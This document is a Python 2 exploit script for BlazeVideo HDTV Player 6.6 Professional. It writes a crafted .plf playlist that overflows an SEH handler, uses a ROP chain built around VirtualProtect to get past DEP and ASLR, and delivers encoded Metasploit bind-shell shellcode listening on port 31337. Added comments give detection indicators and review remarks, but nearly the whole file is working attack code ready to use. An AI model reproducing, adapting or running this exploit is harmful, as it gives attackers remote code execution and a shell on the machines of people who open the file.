# Exploit Title: BlazeVideo HDTV Player 6.6 Professional (Win 7/8 DEP+ASLR Bypass)
# Date: 03/18/2018
# Exploit Author: tiptiptip (based on spawm exploit)
# Just updated the ROP with the one generated by Mona with fixes :P
import struct
# Output artifact and the fixed-size layout pieces that precede the ROP chain.
# Everything below is Python 2 (str == bytes, print statement at the bottom);
# it will not run unchanged under Python 3.
file = 'blaze_exploit_rop.plf'  # output playlist file (NOTE: shadows the Python 2 builtin `file`)
totalsize = 5000  # the finished file is padded with 'C' bytes up to exactly this length
# Overflow region: one 4-byte little-endian address repeated 218 times.
# From a detection standpoint, a .plf playlist consisting of long runs of the
# same DWORD followed by uniform padding is the hallmark of this crafted file.
adv = struct.pack('<L', 0x613010b8) * 218 # ADD ESP,10 RETN 0x613010B8
# Presumably the overwritten SEH handler (variable name only; the gadget
# comment is ADD ESP,800) — confirm against the target's crash layout.
seh = struct.pack('<L', 0x61303744) # ADD ESP,800 0x61303744
# Sled of RETN gadgets in front of the real chain.
ropnop = struct.pack('<L', 0x61326003) * 44 # RETN (ROP NOP) [DTVDeviceManager.dll]
#========================
def create_rop_chain():
    """Return the ROP chain as a raw Python 2 str of little-endian DWORDs.

    Each entry is either a gadget/IAT address inside one of the player's
    DLLs (module named in the per-line comment, chain generated by mona per
    the file header) or an immediate that a preceding POP consumes.  The
    addresses are hard-coded, so the chain only holds if those modules load
    at the same base every time — the header claims that, but it cannot be
    verified from this file.

    Lines left as comments are the author's change log (gadgets that were
    swapped out); they are not part of the emitted chain.
    """
    rop_gadgets = [
        0x6404ff59, # POP ECX # RETN [MediaPlayerCtrl.dll]
        0x640562cc, # ptr to &VirtualProtect() [IAT MediaPlayerCtrl.dll]
        0x6401d210, # MOV EAX,DWORD PTR DS:[ECX] # RETN [MediaPlayerCtrl.dll]
        0x640365ee, # XCHG EAX,ESI # RETN [MediaPlayerCtrl.dll]
        0x60328828, # POP EBP # RETN [Configuration.dll]
        0x6161055a, # & push esp # ret 0c [EPG.dll]
        # (Not working, not in .text section) 0x6034be03, # jmp esp [Configuration.dll]
        0x61324378, # POP EAX # RETN [DTVDeviceManager.dll]
        # (Changed from 201 to 501) 0xfffffdff, # Value to negate, will become 0x00000201
        0xfffffaff, # Value to negate, will become 0x00000501
        0x61336e8b, # NEG EAX # RETN [DTVDeviceManager.dll]
        0x61641c70, # XCHG EAX,EBX # RETN [EPG.dll]
        0x6162a3e2, # POP EAX # RETN [EPG.dll]
        0xffffffc0, # Value to negate, will become 0x00000040
        0x6404dc34, # NEG EAX # RETN [MediaPlayerCtrl.dll]
        # (Damage ESI) 0x64011f80, # XCHG EAX,EDX # POP ESI # ADD ESP,8 # RETN 0x0C [MediaPlayerCtrl.dll]
        # (No longer required) 0x41414141, # Filler (compensate)
        # (No longer required) 0x41414141, # Filler (compensate)
        0x61336e78, # XCHG EAX,EDX # TEST EAX,16AFFFF # POP EAX # RETN ** [DTVDeviceManager.dll] ** | asciiprint,ascii,alphanum,lowernum {PAGE_EXECUTE_READ}
        0x41414141, # Filler (compensate)
        # NOTE(review): this is the same address as the first entry, which is
        # labelled MediaPlayerCtrl.dll there; the module name on this line looks
        # mislabelled.
        0x6404ff59, # POP ECX # RETN [EPG.dll]
        # (Permission = RWE, Not working if DEP is enabled) 0x6405f857, # &Writable location [MediaPlayerCtrl.dll]
        # NOTE(review): 0x603xxxxx matches the Configuration.dll addresses used
        # elsewhere in this chain, not MediaPlayerCtrl.dll (0x640xxxxx) — the
        # module label here may be wrong; verify with the module map.
        0x60351111, # &Writable location [MediaPlayerCtrl.dll]
        0x61322ba3, # POP EDI # RETN [DTVDeviceManager.dll]
        0x6403e80e, # RETN (ROP NOP) [MediaPlayerCtrl.dll]
        0x6132bf7b, # POP EAX # RETN [DTVDeviceManager.dll]
        0x90909090, # nop
        0x6033375d, # PUSHAD # RETN [Configuration.dll]
    ]
    # Python 2 only: struct.pack returns str here, so ''.join works.  Under
    # Python 3 this join would raise TypeError (bytes items, str separator).
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#=======================
nop = '\x90' * 32  # 32-byte NOP slide placed between the chain and the shellcode
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=31337, RHOST=, EXITFUNC=process,
# Defender note: per the generator comment above, the post-exploitation
# indicator is a new TCP listener on port 31337 in the player's process; the
# shikata_ga_nai encoding means the static bytes below will vary per build.
shellcode = (
"\xdd\xc1\xd9\x74\x24\xf4\xbb\xc4\xaa\x69\x8a\x58\x33\xc9\xb1"
"\x56\x83\xe8\xfc\x31\x58\x14\x03\x58\xd0\x48\x9c\x76\x30\x05"
"\x5f\x87\xc0\x76\xe9\x62\xf1\xa4\x8d\xe7\xa3\x78\xc5\xaa\x4f"
"\xf2\x8b\x5e\xc4\x76\x04\x50\x6d\x3c\x72\x5f\x6e\xf0\xba\x33"
"\xac\x92\x46\x4e\xe0\x74\x76\x81\xf5\x75\xbf\xfc\xf5\x24\x68"
"\x8a\xa7\xd8\x1d\xce\x7b\xd8\xf1\x44\xc3\xa2\x74\x9a\xb7\x18"
"\x76\xcb\x67\x16\x30\xf3\x0c\x70\xe1\x02\xc1\x62\xdd\x4d\x6e"
"\x50\x95\x4f\xa6\xa8\x56\x7e\x86\x67\x69\x4e\x0b\x79\xad\x69"
"\xf3\x0c\xc5\x89\x8e\x16\x1e\xf3\x54\x92\x83\x53\x1f\x04\x60"
"\x65\xcc\xd3\xe3\x69\xb9\x90\xac\x6d\x3c\x74\xc7\x8a\xb5\x7b"
"\x08\x1b\x8d\x5f\x8c\x47\x56\xc1\x95\x2d\x39\xfe\xc6\x8a\xe6"
"\x5a\x8c\x39\xf3\xdd\xcf\x55\x30\xd0\xef\xa5\x5e\x63\x83\x97"
"\xc1\xdf\x0b\x94\x8a\xf9\xcc\xdb\xa1\xbe\x43\x22\x49\xbf\x4a"
"\xe1\x1d\xef\xe4\xc0\x1d\x64\xf5\xed\xc8\x2b\xa5\x41\xa2\x8b"
"\x15\x22\x12\x64\x7c\xad\x4d\x94\x7f\x67\xf8\x92\xb1\x53\xa9"
"\x74\xb0\x63\x37\xec\x3d\x85\xad\xfe\x6b\x1d\x59\x3d\x48\x96"
"\xfe\x3e\xba\x8a\x57\xa9\xf2\xc4\x6f\xd6\x02\xc3\xdc\x7b\xaa"
"\x84\x96\x97\x6f\xb4\xa9\xbd\xc7\xbf\x92\x56\x9d\xd1\x51\xc6"
"\xa2\xfb\x01\x6b\x30\x60\xd1\xe2\x29\x3f\x86\xa3\x9c\x36\x42"
"\x5e\x86\xe0\x70\xa3\x5e\xca\x30\x78\xa3\xd5\xb9\x0d\x9f\xf1"
"\xa9\xcb\x20\xbe\x9d\x83\x76\x68\x4b\x62\x21\xda\x25\x3c\x9e"
"\xb4\xa1\xb9\xec\x06\xb7\xc5\x38\xf1\x57\x77\x95\x44\x68\xb8"
"\x71\x41\x11\xa4\xe1\xae\xc8\x6c\x11\xe5\x50\xc4\xba\xa0\x01"
"\x54\xa7\x52\xfc\x9b\xde\xd0\xf4\x63\x25\xc8\x7d\x61\x61\x4e"
"\x6e\x1b\xfa\x3b\x90\x88\xfb\x69")
# File layout, in order: adv | seh | ropnop | rop_chain | nop | shellcode | 'C' padding.
payload = adv + seh + ropnop + rop_chain + nop + shellcode
# Pads to totalsize.  If the payload were ever longer than totalsize this
# would silently produce '' (negative repeat count), not an error.
derp = 'C' * (totalsize - len(payload))
payload = payload + derp
# Python 2: writes the str in text mode; no `with`, so the handle is not
# closed if write() raises.  The print statement below is Python 2 syntax.
f = open(file,'w')
f.write(payload)
print "File",file, "created..."
f.close()